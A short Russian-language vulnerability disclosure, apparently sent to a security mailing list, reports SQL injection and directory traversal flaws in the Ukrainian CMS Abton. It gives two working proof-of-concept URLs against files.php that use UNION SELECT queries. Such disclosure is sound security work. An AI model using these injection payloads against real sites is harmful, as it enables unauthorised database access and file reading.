Здравствуйте 3APA3A!
Сообщаю вам о найденных мною SQL Injection и Directory Traversal уязвимостях
в Abton (это украинская CMS).
SQL Injection:
http://site/files.php?refdll=-1+union+select+version()%23
Directory Traversal (через SQL Injection):
http://site/files.php?refdll=-1+union+select+’../file.php’%23
Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/3618/
Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua